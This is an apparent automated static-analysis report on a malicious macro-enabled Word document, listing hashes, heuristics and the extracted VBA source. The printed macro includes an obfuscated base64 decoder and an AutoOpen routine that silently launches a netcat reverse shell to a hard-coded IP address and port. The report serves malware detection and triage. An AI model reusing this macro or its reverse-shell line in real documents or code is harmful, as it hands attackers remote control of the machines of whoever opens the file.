Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 32a3eeb50c611398…

MALICIOUS

Office (OOXML)

100.1 KB Created: 2021-05-25 16:47:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-06-04
MD5: d3e921b09762fbfb962534ba7681298a SHA-1: 504050808dafdf5be60d4d03ade0f85b90b367a3 SHA-256: 32a3eeb50c611398f9b167e5583e3ba0a93d534003b371ef03a297bd4f850f7f
184 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is an OOXML document containing VBA macros, specifically an AutoOpen macro that utilizes the Shell() function. This indicates the document is designed to execute arbitrary commands upon opening, a common technique for downloading and executing further malicious payloads. The presence of a long encoded blob and the use of Shell() strongly suggest a downloader or dropper functionality.

Heuristics 7

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2793 bytes
SHA-256: f4452d2a723732b5095043349bb15288d2be66148e8b3871a45a33f9488819fc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"

Option Explicit
Private Const t47aee88c7a731e3816dfeb55c901b6f5 = 16515072
Private Const bce7d6f017602d61894136448a656db49 = 258048
Private Const b1c596f0e4c47133228ab656a351abd97 = 4032
Private Const bb062861ae1bbc1b0d1e5373f0d7f7708 = 63
Private Const x932b76b4b7f69eef7436f94f902770ed = 16711680
Private Const m8b161f32fccf62fc71f827a6d0ca894d = 65280
Private Const w62553155d6635441d2e3cbb9d67bda86 = 255
Private Const r8fdf7075ee0cc4bacd5ad60bd5b5e908 = 262144
Private Const n5dffe02da911c9d5eb50a2b40b9f7f1b = 4096
Private Const n36f15627c348a25735f7b0a55ad0679b = 64
Private Const z916a5c98b6e8acbc8b17ad0d67906178 = 256
Private Const m4d7d173f7f668e88876c3bfef35395c0 = 65536

Public Function monkey(sString As String) As String
Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
Dim lTemp As Long
sString = Replace(sString, vbCr, vbNullString)
sString = Replace(sString, vbLf, vbNullString)
lTemp = Len(sString) Mod 4
If InStrRev(sString, "==") Then
iPad = 2
ElseIf InStrRev(sString, "=") Then
iPad = 1
End If
For lTemp = 0 To 255
Select Case lTemp
Case 65 To 90
bTrans(lTemp) = lTemp - 65
Case 97 To 122
bTrans(lTemp) = lTemp - 71
Case 48 To 57
bTrans(lTemp) = lTemp + 4
Case 43
bTrans(lTemp) = 62
Case 47
bTrans(lTemp) = 63
End Select
Next lTemp
For lTemp = 0 To 63
lPowers6(lTemp) = lTemp * n36f15627c348a25735f7b0a55ad0679b
lPowers12(lTemp) = lTemp * n5dffe02da911c9d5eb50a2b40b9f7f1b
lPowers18(lTemp) = lTemp * r8fdf7075ee0cc4bacd5ad60bd5b5e908
Next lTemp
bIn = StrConv(sString, vbFromUnicode)
ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)
For lChar = 0 To UBound(bIn) Step 4
lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))
lTemp = lQuad And x932b76b4b7f69eef7436f94f902770ed
bOut(lPos) = lTemp \ m4d7d173f7f668e88876c3bfef35395c0
lTemp = lQuad And m8b161f32fccf62fc71f827a6d0ca894d
bOut(lPos + 1) = lTemp \ z916a5c98b6e8acbc8b17ad0d67906178
bOut(lPos + 2) = lQuad And w62553155d6635441d2e3cbb9d67bda86
lPos = lPos + 3
Next lChar
sOut = StrConv(bOut, vbUnicode)
If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)
monkey = sOut
End Function



Sub AutoOpen()
    Dim PSResp As String
    PSResp = Shell("nc -e sh 192.168.1.252 9001", vbHide)

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 26624 bytes
SHA-256: 5caf0afe4a2db3284de28eea3264b9794369b6d37c98fd4065d74b7ed55e3f35
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 long base64-like blob(s).